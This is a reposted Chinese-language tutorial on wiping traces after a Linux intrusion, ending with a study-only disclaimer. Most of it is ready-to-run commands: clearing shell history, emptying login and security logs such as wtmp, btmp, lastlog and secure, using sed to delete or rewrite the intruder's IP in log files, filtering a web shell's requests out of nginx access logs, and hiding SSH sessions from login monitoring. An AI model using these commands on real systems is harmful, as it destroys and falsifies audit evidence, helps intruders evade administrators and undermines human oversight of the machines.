Linux 入侵痕跡清理技巧


清除history歷史命令記錄

vim ~/.bash_history
//編輯history記錄文件,刪除部分不想被保存的歷史命令
history -c
//清除當前用戶的history命令記錄
HISTSIZE=0
//通過修改配置文件/etc/profile,使系統不再保存命令記錄

清除系統日志痕跡

  • Linux 系統存在多種日志文件,來記錄系統運行過程中產生的日志。
/var/log/btmp   記錄所有登錄失敗信息,使用lastb命令查看
/var/log/lastlog 記錄系統中所有用戶最后一次登錄時間的日志,使用lastlog命令查看
/var/log/wtmp    記錄所有用戶的登錄、注銷信息,使用last命令查看
/var/log/utmp    記錄當前已經登錄的用戶信息,使用w,who,users等命令查看
/var/log/secure   記錄與安全相關的日志信息
/var/log/message  記錄系統啟動后的信息和錯誤日志
  • 清空日志文件
[root@centos]# echo > /var/log/btmp 
[root@centos]# lastb             
//清除登陸系統失敗的記錄,查詢不到登錄失敗信息
[root@centos]# echo > /var/log/wtmp  
[root@centos]# last              
//清除登錄系統成功的記錄,查詢不到登錄成功的信息
清除用戶最后一次登錄時間:echo > /var/log/lastlog          #lastlog命令
清除當前登錄用戶的信息:echo >   /var/log/utmp             #使用w,who,users等命令
清除安全日志記錄:cat /dev/null >  /var/log/secure
清除系統日志記錄:cat /dev/null >  /var/log/message
  • 刪除/替換部分日志
    日志文件全部被清空,太容易被管理員察覺了,如果只是刪除或替換部分關鍵日志信息,那么就可以完美隱藏攻擊痕跡。
sed  -i '/自己的ip/'d  /var/log/messages
//刪除所有匹配到字符串的行,比如以當天日期或者自己的登錄ip
sed -i 's/192.168.166.85/192.168.1.1/g' secure
//全局替換登錄IP地址

清除web入侵痕跡

sed -i 's/192.168.166.85/192.168.1.1/g' access.log
//直接替換日志IP地址
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
//使用grep -v來把我們的相關信息刪除
cat tmp.log > /var/log/nginx/access.log/
//把修改過的日志覆蓋到原日志文件

文件安全刪除工具

實現安全的從硬盤上擦除數據,默認覆蓋3次,通過 -n指定數據覆蓋次數。


隱藏遠程SSH登陸記錄

ssh -T root@192.168.0.1 /bin/bash -i
//隱身登錄系統,不會被w、who、last等指令檢測到
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
//不記錄ssh公鑰在本地.ssh目錄中

轉載鏈接

bypass-Linux 入侵痕跡清理技巧

聲明

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM